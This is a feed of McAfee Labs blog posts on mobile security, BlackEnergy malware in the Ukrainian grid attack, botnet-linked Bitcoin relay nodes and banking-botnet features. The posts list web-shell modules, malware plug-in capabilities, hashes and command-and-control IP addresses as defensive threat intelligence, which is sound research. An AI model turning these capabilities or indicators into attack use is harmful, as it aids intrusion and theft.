After four days at the event, what became obvious to me is that we have certainly progressed from the days when a mobile phone was capable only of making calls, sending SMS messages, and playing the occasional game of Snake. The exhibition hall was packed full of companies showcasing the latest smartphone capabilities and Internet-connected devices that look to make mobile devices even more central to the way we live our lives. In fact, we can now use our phones to unlock car doors, control the heating in our homes, and monitor our health, all while on the move. What excited many industry experts, however, was virtual reality. It seems everyone was talking about it (as you can see from the word cloud, below). LG, HTC, and Facebook (to name just a few) made noise about their virtual reality products and Samsung even had its own virtual theater, allowing visitors to try their hands at snowboarding.

What was undoubtedly clear from MWC, then, is that future mobile technologies will go far beyond a smartphone. Companies, both well-known and those making a name for themselves, were keen to use the event to showcase just what experiences they are capable of delivering to their customers beyond a call, text, or casual Internet surf.

The networks supporting these devices, for example, was a much discussed topic, with 5G taking center stage. Although this side of MWC tends to slip under the radar, many industry experts believe the rise of the Internet of Things will truly be successful only with the introduction of 5G. As such, the work going into the building of networks that can support the connected world was a hotly discussed topic—showing the sheer scale to which this mobile ecosystem is growing.

Evidently from MWC, 2016 is going to be an exciting year for innovation in mobile—one that it is going to excite consumers and pave the way for the connected world. But for this to be a success, we need to first and foremost address security. We know that where consumers go, criminals go too. And we only have to look at the figures to see that they are going to mobile devices: Our latest Mobile Threat Report found that 37 million mobile malware have been detected during the last six months.

Of course, the criminals are not after the devices. They want the valuable data. Facebook’s Mark Zuckerberg said in his keynote said that virtual reality will provide another level of tailored and emotional connection for brands and consumers alike, given the huge amount of personal data collected on the headset. But what happens when this data falls into the wrong hands? Today, unfortunately, it’s not a question of “if” but “when.”

In a world of 5G hyperconnectivity, in which more data gathering and devices will become more ingrained in our personal and professional lives, trusting the access given to personal information will be crucial. We need to do more today to set the stage. We need to first get right the security basics and establish that foundation of trust so that companies can deliver on the promises we’ve seen at MWC.

The biggest trends of MWC 2016:

2016-03-03 Raj MWC

The post A Future Beyond Mobile Devices; Trusting the Promises of Mobile World Congress appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-future-beyond-mobile-devices-trusting-the-promises-of-mobile-world-congress/feed/ 1
Does Anyone Really Care About Mobile Security? https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/anyone-really-care-mobile-security/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/anyone-really-care-mobile-security/#respond Wed, 17 Feb 2016 14:00:06 +0000 https://blogs.mcafee.com/?p=47615 I’ve attended Mobile World Congress a number of times and it is fair to say the concept of the show has evolved over the years. Previously, when someone said “mobile” we thought of physical handsets; whereas the term today has a much more complex definition. “Mobile” now is a reflection of the Internet of Things […]

The post Does Anyone Really Care About Mobile Security? appeared first on McAfee Blogs.

]]>
I’ve attended Mobile World Congress a number of times and it is fair to say the concept of the show has evolved over the years. Previously, when someone said “mobile” we thought of physical handsets; whereas the term today has a much more complex definition. “Mobile” now is a reflection of the Internet of Things (IoT) and the hyperconnected world we live in.

You only have to look at the thousands of connected devices presented at CES—from wearables to smart refrigerators—to see the extent to which IoT will soon be ingrained in our everyday lives. But with more devices come more threats. And security needs to take center stage if users are going to trust their devices, especially as that trust has been tainted in light of the numerous breaches last year of high-profile companies such as TalkTalk and Ashley Madison. More users now demand to know their personal information cannot be compromised; we saw this shift when thousands of TalkTalk’s customers went elsewhere after the breach.

It’s worrying that some companies have not gotten the memo. Just last week we learned that VTech had updated its terms and conditions, and what I read filled me with despair. Under the new terms, VTech says families using its software do so at their “own risk.” The company places the entire security burden on its customers, claiming it is not liable in the case of future attacks by asking its customers to accept that “any information you send or receive during your use of the site may not be secure and may be intercepted or later acquired by unauthorized parties.”

When the company was hacked last year, more than 6.3 million children’s accounts were compromised, with conversations, photos, and video messages between families exposed. Do you want to live in a world in which companies can get away with this responsibility shift while selling us connected devices for our homes and for our children? I know I don’t. The implications of such a stance becoming the norm are worrying. Although the Information Commissioner’s Office has stated that the responsibility of protecting data does lie with the manufacturer, I question whether market pressure (customers) will demand better security.

Organizations have a duty to care for their customers. If the consumers companies want to reach are ever going to fully adopt these technologies, trust between the two parties will have to evolve.

This Mobile World Congress, we will be exposed to a world of exciting new technologies and opportunities as we move into an even more connected future. But as we acknowledge the move beyond the traditional handset to the new generation of digital devices, we need to address the issues around privacy, security, and control that come with them. As connected devices become more common and essential to our lives, security basics need to be the priority, right from the start. Without first establishing a foundation of trust, the exciting prospect of 5G and the wider future of IoT will fundamentally fail.

The post Does Anyone Really Care About Mobile Security? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/anyone-really-care-mobile-security/feed/ 0
A Case of Mistaken Identity? The Role of BlackEnergy in Ukrainian Power Grid Disruption https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blackenergy_ukrainian_power_grid/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blackenergy_ukrainian_power_grid/#respond Fri, 05 Feb 2016 22:20:36 +0000 https://blogs.mcafee.com/?p=47431 Recent reports of electricity outages across the Ukraine has led to significant speculation regarding the specific malware that was used to disrupt supplies. McAfee’s approach in understanding this event included making contact with the impacted organization to offer our support and, where possible, retrieving data in order to analyze the true nature of the threat. […]

The post A Case of Mistaken Identity? The Role of BlackEnergy in Ukrainian Power Grid Disruption appeared first on McAfee Blogs.

]]>
Recent reports of electricity outages across the Ukraine has led to significant speculation regarding the specific malware that was used to disrupt supplies. McAfee’s approach in understanding this event included making contact with the impacted organization to offer our support and, where possible, retrieving data in order to analyze the true nature of the threat. In this case the impacted organization allowed us to publicly share our findings to benefit the entire industry. Researchers from the Advanced Programs Group (APG) team within mcAfee were able to analyze multiple samples that were used in an attack, raising questions regarding the role of BlackEnergy in disrupting the supply of electricity. We would also like to acknowledge the support we were provided in the technical investigation of our partner BAKOTECH Group.

This post builds upon our initial blog posting that detailed the historical evolution of BlackEnergy.

It begins with a phish

Our malware “zoo” within McAfee Labs contains a wealth of data that can be used to identify the reuse of tools in a particular attack. In this instance we cross-referenced the initial dropper and collected samples that were used by infected systems. This was absolutely necessary because the criminal infrastructure used to host the second malware instance was offline when our analysis began. As we began, we identified a number of similarities with previous campaigns that targeted the energy sector.

In March 2015, an email appearing to be from the Supreme Council of Ukraine (Verkhovna Rada of Ukraine) was sent to multiple state institutions in the country. One of the targets in this campaign was a power company situated in the western part of the Ukraine. The spear-phishing email contained an XLS attachment with a macro in it.

Picture1

Once the document was opened, a macro was executed, the BlackEnergy dropper was created, and the dropper started to download the final BlackEnergy 2/3 version.

One of the interesting email artifacts was a part of the SMTP header that pointed into an IP address and name of the mail server used to spread the spear-phishing emails.

We received information that, once the attackers were in the network, they compromised a web server and used it as a beachhead for entering a segment of the company’s network. The attackers were using tools that are freely available on the Internet for download, including web shells, tunneling tools, and SSH server tools.

If we compare the previous attack with the BlackEnergy attack on the grid reported in December, we can recognize a number of similarities. First, the attack vector is exactly the same, namely a spear-phishing campaign.  An example of the content of the email follows:

Picture2

The attachment was a weaponized Excel worksheet containing a dropper. Once launched, the payload was downloaded from a site hosted in the Ukraine.

We investigated the SMTP headers in this case and found that the attack in December leveraged a mail server with the same IP address and name as a server used in the previously described campaign in March. The energy sector was one of the targets in both campaigns.

Besides these files, we received also a package of suspicious files for analysis. These files were part of a web template system called Synio. The Synio template is part of the LiveStreet Content Management System (CMS). Livestreet is a Russian site that allows for the free download of engines for blogging and social networking. We do not know whether these files were related to the spear-phishing campaign or part of lateral movement. However, we noticed references to the Synio template being used on the server that hosted the payload for the dropper: “8080/templates/compiled/synio/…” One of the files in the templates was definitely not part of normal content management.

After analysis of this php file, we determined that it was a php web shell.

Picture3

These WSO web shells are often used after compromising a server to maintain access. They usually support multiple modules with a variety of features. In this case the shell included the following modules:

  • Console
  • SQL Manager
  • Support for Windows and Linux OS
  • Server information
  • File manager
  • Editing, modifying files
  • SQL console
  • PHP console
  • Network analysis tools

Access to the web shell was secured with an easy-to-crack MD5 password.

One interesting feature was the “search for hash option”—in which discovered hashes could be sent to certain sites that might have cracked the value for these hashes:

Picture4

For both the March and December attacks, there are some similarities:

  • Spear phishing using weaponized Office documents.
  • Email sender is using a valid “info” addressee in the Ukraine.
  • Same mail provider and server used.
  • The usage of common backdoor tools.
  • Sophistication of attacks was low.

The use of BlackEnergy for espionage is not new, but prior to the December attack, there has been no evidence that prior campaigns used BlackEnergy for more than stealing confidential information from a victim organization. Although the latest attack included a wiper component, we did not find any evidence that this malware specifically targeted SCADA systems. Therefore, it appears unlikely that the BlackEnergy malware was the direct cause of the outage. It is unclear if a single actor both controlled BlackEnergy and also issued a coordinated shutdown of the electrical system.

Meanwhile, the spear-phishing campaigns in Ukraine appear to have continued into January 2016, using Word documents instead of Excel. Although our information does not yet point to a clear cause, additional details are emerging and our analysis is ongoing. We have greater confidence that the follow-up phishes were from the same group, than that this group was responsible for the availability disruption. Not only does this attack show the same modus operandi but is more aligned with the level of technical sophistication that we have seen with BlackEnergy. We are continuing our analysis as we receive more samples and will provide more detail in due course.

The post A Case of Mistaken Identity? The Role of BlackEnergy in Ukrainian Power Grid Disruption appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blackenergy_ukrainian_power_grid/feed/ 0
Updated BlackEnergy Trojan Grows More Powerful https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/updated-blackenergy-trojan-grows-more-powerful/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/updated-blackenergy-trojan-grows-more-powerful/#respond Thu, 14 Jan 2016 18:33:30 +0000 https://blogs.mcafee.com/?p=47010 In late December, a cyberattack caused a power outage in the Ukraine, plunging hundreds of thousands of citizens into darkness for hours. Threat researchers soon confirmed that the BlackEnergy malware package, first developed in 2007, was the culprit. They also discovered that the malware has been significantly upgraded since its first release. The initial BlackEnergy […]

The post Updated BlackEnergy Trojan Grows More Powerful appeared first on McAfee Blogs.

]]>
In late December, a cyberattack caused a power outage in the Ukraine, plunging hundreds of thousands of citizens into darkness for hours. Threat researchers soon confirmed that the BlackEnergy malware package, first developed in 2007, was the culprit. They also discovered that the malware has been significantly upgraded since its first release.

The initial BlackEnergy was a simple Trojan with distributed denial of service capabilities. Since then, there have been two upgrades.

BlackEnergy 2

In 2010, BlackEnergy 2 appeared. In that development cycle, the authors completely rewrote the code and began to incorporate a more professional approach. For example, they implemented a rudimentary installer that made it simpler to use BlackEnergy.

With the growth in BlackEnergy 2’s popularity, the authors decided that they needed to add additional features and provide BlackEnergy with a more modular framework. In 2011, they added UAC bypass installers. This method allowed BlackEnergy 2 to gain elevated code execution privileges using the framework Microsoft provides to help legacy applications work with newer versions of Windows. One of BlackEnergy 2’s most impressive features was released in 2013 with the support of 64-bit drivers.

BlackEnergy 3

In the second quarter of 2014, F-Secure was the first to report a new variant of BlackEnergy. This variant no longer uses many of the features of BlackEnergy 2.

Each major release has seen an almost complete rewrite of the code. BlackEnergy 3 has more advanced features than its predecessors and is more cleanly developed. The new release does not have a driver, the build ID format is a timestamp, and it has many advanced protection mechanisms. These internal protections include defenses against virtual environments, antidebugging methods, and continued checks throughout the code that will kill the program if it detects other security functions or countermeasures. What stands out about Black Energy 3 are the variety of plug-ins it incorporates:

BlackEnergy 3 plug-ins*:

  • fs.dll — File system operations
  • si.dll — System information, “BlackEnergy Lite”
  • jn.dll — Parasitic infector
  • ki.dll — Keylogger
  • ps.dll — Password stealer
  • ss.dll — Screenshots
  • vs.dll — Network discovery, remote execution
  • tv.dll — Team viewer
  • rd.dll — Simple pseudo “remote desktop”
  • up.dll — Update malware
  • dc.dll — List Windows accounts
  • bs.dll — Query system hardware, BIOS, and Windows info
  • dstr.dll — Destroy system
  • scan.dll — Network scan

These plug-ins are critical and powerful features in BlackEnergy 3 that make it a “go-to” tool for both crimeware and state-sponsored actors.

The Ukrainian critical infrastructure attack was initially seen as politically driven. Indeed, the use of BlackEnergy 3 could well be a cover for a targeted manual attack in an effort to disrupt availability.  However, at this point in the analysis, attributing the attack to a group or actor is premature.

Based on its functionality, BlackEnergy 3 could certainly be used by state-sponsored groups as it allows these actors to hide among other crimeware groups known to use BlackEnergy variants. Tradecraft is often shared and many actors like to impersonate other actors in efforts to hide their true affiliations and sponsorships.

This is in stark contrast to Stuxnet, which first captured headlines in 2010. Examination of the Stuxnet code by threat researchers revealed that the authors needed unique domain knowledge to execute it in a specific environment and that only state-sponsored groups likely had the insight and capability to create this malicious piece of code.

At the end of this post you will find all of the MD5 hashes associated with BlackEnergy in 2015. McAfee products provide full coverage for all hashes listed.

Several of the malicious binaries used in these attacks contain fake Microsoft digital certificates. The process of code signing is used to authenticate the software’s author and guarantee that the code has not been altered or corrupted since it was signed. Faking the code signing process reduces trust in this system and is indicative of a higher level of adversary involvement. Such techniques have been used by many actors and advanced-threat groups, but it is still too early to attribute this attack to any group or actor.

We would like to thank McAfee Advanced Programs Group for their support in the development of this analysis.

 

MD5 hashes associated with BlackEnergy 3 in 2015:

Binaries allegedly associated with Ukraine attack:

c2fb8a309aef65e46323d6710ccdd6ca
2cae5e949f1208d13150a9d492a706c1
ed55997aada076dc61e20e1d1218925a
60d3185aff17084297a2c4c2efdabdc9
7361b64ddca90a1a1de43185bd509b64
97d6d1b36171bc3eafdd0dc07e7a4d2d
72bd40cd60769baffd412b84acc03372
97b41d4b8d05a1e165ac4cc2a8ac6f39
979413f9916e8462e960a4eb794824fc
956246139f93a83f134a39cd55512f6d
d98f4fc6d8bb506b27d37b89f7ce89d0
66676deaa9dfe98f8497392064aefbab
8a40172ed289486c64cc684c3652e031
cd1aa880f30f9b8bb6cf4d4f9e41ddf4
0af5b1e8eaf5ee4bd05227bf53050770
1d6d926f9287b4e4cb5bfc271a164f51
e60854c96fab23f2c857dd6eb745961c

Other BlackEnergy binaries:

97b7577d13cf5e3bf39cbe6d3f0a7732
18e7885eab07ebfb6d1c9303b992ca21
66b96dcef158833027fcf222004b64d8
03e9477f8da8f6f61b03a01d5a38918f
0d2022d6148f521c43b9573cd79ead54
1e439a13df4b7603f5eb7a975235065e
a0b7b80c3c1d9c1c432a740fa17c6126
dcf6906a9a0c970bcd93f451b9b7932a
973e0c922eb07aad530d8a1de19c7755
557f8d4c6f8b386c32001def807dc715
fffeaba10fd83c59c28f025c99d063f8
0037b485aa6938ba2ead234e211425bb
abeab18ebae2c3e445699d256d5f5fb1

BlackEnergy 3 IP addresses:

109.236.88.12
124.217.253.10
146.0.74.7
184.22.205.194
188.128.123.52
188.227.176.74
188.40.8.72
194.28.172.58
212.124.110.62
212.175.109.10
31.210.111.154
37.220.34.56
46.165.222.101
46.165.222.28
46.165.222.6
46.4.28.218
5.149.254.114
5.255.87.39
5.61.38.31
5.79.80.166
5.9.32.230
78.46.40.239
84.19.161.123
85.17.94.134
88.198.25.92
89.149.223.205
93.170.127.100
94.185.85.122
95.143.193.182
95.211.122.36

 

The post Updated BlackEnergy Trojan Grows More Powerful appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/updated-blackenergy-trojan-grows-more-powerful/feed/ 0
Blockchain Transactions Create Risks for Financial Services https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/#respond Thu, 17 Dec 2015 00:36:35 +0000 https://blogs.mcafee.com/?p=46674 This post was written by Raj Samani and Christiaan Beek of McAfee , and Shane D. Shook, PhD. Trust is the most valuable commodity in the digital age. Failure to trust the systems or organizations in which we place our digital assets leads us to look at alternate providers, or to withdraw entirely from a […]

The post Blockchain Transactions Create Risks for Financial Services appeared first on McAfee Blogs.

]]>
This post was written by Raj Samani and Christiaan Beek of McAfee , and Shane D. Shook, PhD.

Trust is the most valuable commodity in the digital age. Failure to trust the systems or organizations in which we place our digital assets leads us to look at alternate providers, or to withdraw entirely from a suspect service. Within the financial services industry, the notion of trust is of paramount importance to institutions and account holders alike. Investors must be confident that the money they have in their accounts is available for use whenever they need it, and that the routes and terminals involved in buying Christmas presents, for example, are protected with many layers of security.

But what happens with this concept of trust if, for example, one in every 25 withdrawals made from an ATM is authorized by a bank operated by a known criminal organization? Or if one of every six credit card purchases was transacted by a terminal suspected to be controlled by known criminal organizations? It is likely the implied level of trust customers have in the financial system would be shaken; moreover, they would certainly seek a more trustworthy provider for financial transactions.

Looking at trust among cryptocurrencies, McAfee has undertaken an analysis of Bitcoin to determine the likely risk to transactions made with this increasingly popular method of payment. In particular, we focused on the risks to the security of the network that serves the “blockchain,” the public database of all Bitcoin transactions. Although our research did not identify any specific risks associated with the security of the funds exchanged, we did identify risks that may affect the reliability of the blockchain itself. Our focus was predominantly on Bitcoin relay nodes, and the integrity of those nodes.

Whenever these transaction relay nodes do not offer a sufficient level of integrity (for example, being a part of botnet operations), they could be used to manipulate Bitcoin transactions through route control, denial of service, or by modifying transaction protocols. Moreover, a botnet-controlled relay node can be monitored to reveal the identity of one party in a transaction. If enough relay nodes are connected by a botnet operator, it may even be possible to deanonymize the other parties. Further, as the blockchain and related products have evolved, vulnerabilities in software clients have cropped up. Attempts to exploit the Bitcoin peer-to-peer network are known in research as well as in the wild; thus the knowledge of botnet- or malware-associated peers is a concern.

Background
The blockchain is a public ledger that facilitates payment through cryptocurrencies (such as Bitcoin) for goods or services of more than 10,000 vendors and many thousands of individuals, including legitimate (food, airfare, books, cars) and illegitimate (malware, extortion/ransom, drugs). The blockchain is also being explored for commercial purposes with new offerings created for “secure exchange” services such as currencies, contracts, and equities trading or clearing.

The blockchain includes literal details concerning every transaction between addresses that have successfully negotiated a transfer, such as Bitcoin payments from one wallet to another, including time, sender and receiver wallet addresses, amounts, and relay IP addresses (both v4 and v6) of “bitnodes” that facilitate the transactions’ communications.

At any time there are around 9,000 active bitnodes, some that operate as “full nodes” (peers) and others that serve as relays or a type of proxy, also known as a “lightweight node.”

20151216 Blockchain1

Source: https://bitnodes.21.co/

Related Risks
Approximately 2% of the bitnodes were coincidentally included for use by malware samples, and another 1% of bitnodes were included on Internet blacklists related to botnet control servers or other compromised hosts, according to data collected from Blockchain.info and Bitnodes.io (which peer with approximately 70% of active nodes) as well as open-source intelligence (OSINT) about botnets and malicious network addresses of nearly 145,000 unique IP addresses that relayed blockchain transactions for Bitcoin between February–December 2015. Those figures are historical summaries that when viewed in real time reflect more significant risks to the security of blockchain transactions.

For the same period, a real-time review of active bitnodes (available peers) demonstrated that at any given time 4% of bitnodes addresses were included for use by malware samples (available for review on Virustotal.com), and an additional 13% of bitnodes appeared on public Internet blacklists. Thus in effect one in six Bitcoin transactions were relayed by nodes under the control of malicious operators. The difference between the historical and real-time statistics is simple: Bitnodes that correspond with malware or botnets act as blockchain relays more often than others.

For example, let’s look at the following details of a bitnode active on December 2:

20151216 Blockchain2

The malware sample that used the preceding bitnode (IP address) was a Fujacks Trojan, a well-documented botnet backdoor that allows a botmaster to remotely control the infected computer, collect information, and install other malware or tools that suit the botmaster’s (or subscribers’) interests.

20151216 Blockchain3

This bitnode has been active since November 24:

20151216 Blockchain4

The associated malware is the Sefnit Trojan, a botnet backdoor that not only allows the botmaster to remotely control the host, but upon installation also injects a TOR client to mask botnet communications. Compromised computers could suffer the installation of any malicious tools. For example, past infections of Sefnit include ad-click fraud. There is also documented coincidental history of the use of Sefnit by malicious botmasters to mine bitcoins using infected computers. As with many botnets, take down efforts are sometimes temporary, and the subsequent utility of the botnet changes and on occasion expands.

20151216 Blockchain5

Our analysis of the varied malware samples that relate to bitnode addresses which have relayed blockchain transactions during the past 18 months demonstrates that most of the botnets are related to Zeus. Zeus source code has been readily available (in several publicly released iterations and sold in specific versions) since at least 2011. It is a popular “starter kit” for botnet creation, and anyone with relatively modest technical capabilities can build and operate a botnet. More important though, botnets offer subscriber services that can facilitate more exotic crimes than simply compromising access to a computer.

The preceding Sefnit malware sample used that bitnode (IP) address as a TOR relay address, so that not only Bitcoin transactions would relay through that bitnode, but other TOR users could also use that host. Unfortunately not only legitimate TOR users, however: Computers infected with that Sefnit malware would be inducted into a botnet that used that TOR relay (coincidentally the bitnode address).

OSINT and McAfee threat intelligence, respectively, confirmed that 3% of the unique bitnode addresses observed between February and December 2015 were included in malware samples for botnet communications, as control or routing. Of those addresses, the following 30 bitnodes accounted for 25% of associated malware submissions.

20151216 Blockchain6

Our analysis of submitted malware samples that used those bitnode addresses indicated that 83% of related samples were from the following malware families:

 

Malware in Top 30 Bitnode Addresses (Feb–Dec 2015) With Number of Submissions
Allaple 4,611 Carberp 52 Dacic 11
Kelihos 860 Renos 42 Senta 8
Bladabindi 378 Dugenpal 41 Sisron 6
Pykspa 106 Bagsu 35 Vitro 5
Bulta 71 Glupteba 32 Teerac 5
Fynloski 71 Swrort 28 Peaac 4
Zbot 65 Waledac 25 Bumat 3
Dynamer 61 Skeeyah 25 Reveton 1
Sality 57 Omaneat 24 Simda 1
Virut 53 Runpoor 18

Where are they?
This begs the question: Which came first? Was the bitnode (host) set up by a botmaster for nefarious purposes, or was a host compromised and misused for botnet control purposes? As far as blockchain uses go, does it matter? The result is that the particular host is under the botnet control.

Many people mistakenly assume that blockchain transactions are always protected by the use of TOR; however, our analysis of the IP addresses regarding TOR nodes indicates that less than 0.25% of known bitnodes are also TOR nodes. TOR is commonly recommended for use with blockchain software clients, so the coincidence of bitnodes that also serve as TOR nodes is an additional risk to be considered by vendors or subscribers to blockchain technology.

The following map shows the geographic outlay of TOR nodes on December 2.

20151216 Blockchain7

Source: http://cdetr.io/tor-node-map/

Bitnodes are deployed globally according to concentrations of users who support the technology. Consequently, the nodes that coincidentally are used for other purposes (such as TOR or malware control) are equally global in their geolocations. There is general overlap in geographic regions between TOR and bitnodes, although the overlap in addresses is very limited.

20151216 Blockchain8

Source: https://bitnodes.21.co/

Applying OSINT to the blockchain
By using OSINT and proprietary information we can create dispositions of bitnodes by their risk categories. The following map indicates the regional concentrations (on December 2) by bitnodes as (red) Suspicious, (blue) Interesting, and (yellow) Normal. “Suspicious” indicates a bitnode that appears on blacklists and has high detection rates in samples that use the bitnode address. “Interesting” is a bitnode address that is a known TOR exit node or appears in any malware samples. “Normal” encompasses all others.

20151216 Blockchain9

Only a relatively small percentage (17%) comprise Suspicious or Interesting nodes. The following chart indicates the breakout of Suspicious nodes by country code.

20151216 Blockchain10

Other host providers include cloud services and public or free Internet hosts. Such services are sought out and used extensively by botmasters as they often allow limited free use, or full subscription use for a defined period (commonly one to three months before they are abandoned or terminated). Indeed, between February and December, 20% of all unique bitnodes we analyzed existed for no more than one day, 72% for less than one month, 99% for less than three months, and less than 1% existed for more than three months.

More on TOR
The coincidence of the TOR network and bitnodes may be more than OSINT demonstrates. For example, In December 2014 the “LizardSquad” hacked the TOR network, taking control of 30% to 40% of active nodes. One effect of the attacks was an increase in new bitnodes.

The following graph illustrates a 4% increase in Normal nodes and a 1% increase in Suspicious nodes, with a 4% decrease in Interesting nodes that occurred on December 26, 2014, when the TOR attacks began.

20151216 Blockchain11

This data could be interpreted to mean that the additional nodes were botnet nodes previously masked by TOR. The new interesting and suspicious nodes were the product of antimalware submissions and blacklist updates that were reported by researchers. By December 30, 2014, the TOR network had recovered, and the number of visible bitnodes decreased as they were again masked; in the interim, however, the aggregate had increased to an estimated 23% of all bitnodes related to botnets.

In effect, the December 2014 attacks by LizardSquad (and subsequent research performed by security organizations around the world) revealed previously unknown nodes on the Bitcoin network, some associated with malware or botnets. This demonstrates the extent (about  6%) of TOR nodes that provided anonymity to blockchain transactions—at least in that period.

What this means for financial risk
Bitcoin has an estimated market cap of $5.4 billion. On December 2, 2015, a total of $634 million (depending on the exchange venue) in transactions value was routed through the global bitnodes. Although only the noted 17% of bitnodes are indicated to be “known associates” of malware or botnets, those nodes accounted for 31% of the volume of (unconfirmed) transactions relayed that day. In other words, almost $200 million of Bitcoin transactions were relayed through suspect nodes.

What does this mean? There is no risk of these funds being stolen because the blockchain has mechanisms to protect the transaction with distributed (and autonomous) processing and validation. There are, however, availability concerns that go beyond simple outages, for example, the possibility of “value” impediments because the route is manipulated in the peer map of related clients. (The exchange value of Bitcoin is related in part to the volume available for trading and the availability of peers to process the transactions.) Outages may be brief, but they have immediate consequences as peer discovery from “good” to “bad” nodes depends fundamentally on the availability of good nodes.

Beyond interruptions, there is the risk of malicious entities gaining insights into transactions. Botmasters can simply monitor the peers that they control to understand the origin and valuable details of the transactions in their exchange form. Although they will not see into traded contracts, or be able to steal from cryptocurrency exchanges, they can monitor who is trading with whom and how often—and potentially control when/if and where their traffic is able to route.

The health of any network is crucial to the integrity of the service it supports. Financial products and services related to the blockchain may be affected by botnet- or malware-associated nodes that relay transactions, currently or in the future, as the sophistication of attacks and exploits continues.

A final note
Much more specific details of risks are available when the blockchain (ledger) and bitnodes are tied to threat intelligence. On December 2 two ransomware payment addresses for Virlock were used in 14 transactions. Five of the 14 transactions were relayed by bitnodes associated with malware or botnets. Although blacklisting Bitcoin addresses can be a difficult proposition (as many addresses have been stolen from legitimate users’ wallets over time and misused in much the same way that stolen credit card numbers are used sporadically by cybercriminals), some insights of specific addresses are useful to understanding the risk of transactions made with otherwise “anonymous” counterparties.

We might conclude from this research that Bitcoin is a payment platform that cannot be trusted, but that is not the case. Yet we depend on a trustworthy payment platform, and understanding the associated risks allow us to build appropriate controls to mitigate those risks to tolerable levels. Bitcoin, much like any other payment platform (electronic as well as physical) has risks associated with it that appear to be specific to a decentralized virtual currency. Our intention is to highlight some of these risks such that measures can be introduced to mitigate those risks to a level acceptable to all of us operating within this digital society.

 

The post Blockchain Transactions Create Risks for Financial Services appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/feed/ 0
A Dummies Guide to ‘Insider Trading’ via Botnet, Part 2 https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet-part-2/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet-part-2/#respond Mon, 23 Nov 2015 20:00:07 +0000 http://blogs.mcafee.com/?p=24537 This post, the second of two parts, was written by Christiaan Beek, Raj Samani, and Shane Shook.  In our first post, we examined the evolution of the botnet. In this follow-up we will discuss a new botnet operating model that allows an attacker to get an insider’s view of infected organizations without actually being an insider—all while […]

The post A Dummies Guide to ‘Insider Trading’ via Botnet, Part 2 appeared first on McAfee Blogs.

]]>
This post, the second of two parts, was written by Christiaan Beek, Raj Samani, and Shane Shook. 

In our first post, we examined the evolution of the botnet. In this follow-up we will discuss a new botnet operating model that allows an attacker to get an insider’s view of infected organizations without actually being an insider—all while remaining undetected and manipulating data for financial gain.

Fiction or reality?

Many examples of attacks by botnet malware resulting in financial theft or accounts fraud have been published that trace the evolution of “personal” information stealers into “corporate” information stealers. In 2009 Patco Construction, in Sanford, Maine, was robbed of $588,000. In that same year, US law enforcement arrested individuals associated with the incursions via botnets into 390 companies in the United States, with estimated related losses at more than $70 million. Similar activities occurred in 2012 when Tennessee Electric Co. lost almost $328,000 after their bank account was taken over by cyber thieves.

Other examples abound, but the evolution of the use of botnets continues as more and more corporate services are facilitated online. In 2014 Salesforce.com users were targeted by malware configured to automatically steal login details, and even bypass two-factor authentication. Numerous examples of malware configurations to target corporate financial, securities, and other web services are available through cursory Internet searches. Dyre samples include more than 450 URLs intended to be automatically monitored for credentials theft, including corporate and personal web services. Some of the configured URLs include nonspecific wildcards to harvest credentials used for popular corporate financial and HR applications.

In May, the Australian Federal Police released a report concerning corporate securities trading fraud in which malware actors were targeting nontraditional financial platforms in Australia. Investigations into large sums of money fraudulently transferred from various Australian financial institutions using corporate accounts commenced in February 2014.

The investigations showed that two brokerage services were making unusual transactions. Forensic investigations revealed the presence of “financial” malware. The malware, in this instance, was defined as malicious software that has been designed to steal, alter, and compromise financial transactions and credentials.

Some results from the investigation:

  • Logins occurring in excess of a month prior to the first fraudulent transaction.
  • Logins occurring while the broker was listed as absent from work.
  • Logins occurring between specific periods consistent with known Eastern European actors.
  • Logins using specific user-agent strings consistent with known Eastern European actors.
  • Numerous forged authorizations had been processed without question. 

Market information stealer: These seek to help a subscriber gain insights into valuable sensitive and highly protected information. These malware are less focused on credential theft, although that is an important feature for subscribers to discern the financial performance of their victims. Instead the malware facilitates managed access to specific information stores or screens from which time-sensitive information can be surreptitiously observed or copied.

20151120 Raj botnet 1 

In the preceding picture, the botmaster has control over computers in two banks and a trading firm, representing capital markets analysts and a corporate controller. The botmaster is simply providing access to a subscriber (“Malicious Trader”), who can see sensitive information in each company, a kind of “Botnet-Flix.” With that access, the Malicious Trader can use the information to anticipate the financial market and start actions that will give him, or the organization he’s working for, a financial gain.

The crimes committed are not only the intrusion into the bank and trading firm computers, but also the exploitation of the proprietary and sensitive information for gain.

Although this seems an incredible situation, such facilities are provided by a long history of botnet malware that enable automated or manual access to infected computers.

Examples of malware features

The following table shows an overview of banking botnets as of March and the plug-ins and functions available to operators or subscribers:

 

Banking Botnets and Extra Features

 

       
Feature Man in the Browser Redirect VNC/Back Connect Screenshots Video Capture Proxy Certificate Stealer
Zeus Y Y Y Y Plug-in Y Y
IceIX Y Y Y Y Plug-in Y Y
Citadel Y Y Y Y Plug-in Y Y
Gameover Y Y Y Y N Y Y
KINS Y Y Y Y Plug-in Y Y
Shylock Y N Y N Y Y Y
Geodo Y Y Y Y N N Y
Dridex Y Y Y Y N Y Y
Gozi Y N Y Y N Y Y
Dyre Y Y Plug-in Y Y Y Y
Ramnit Y Y Y Y N N N
Tinba Y Y Y Y N Y N
Hesperbot Y Y Plug-in Plug-in Plug-in Plug-in Plug-in

Source: http://www.secureworks.com/assets/pdf-store/other/banking-botnets-persist-2015.pdf

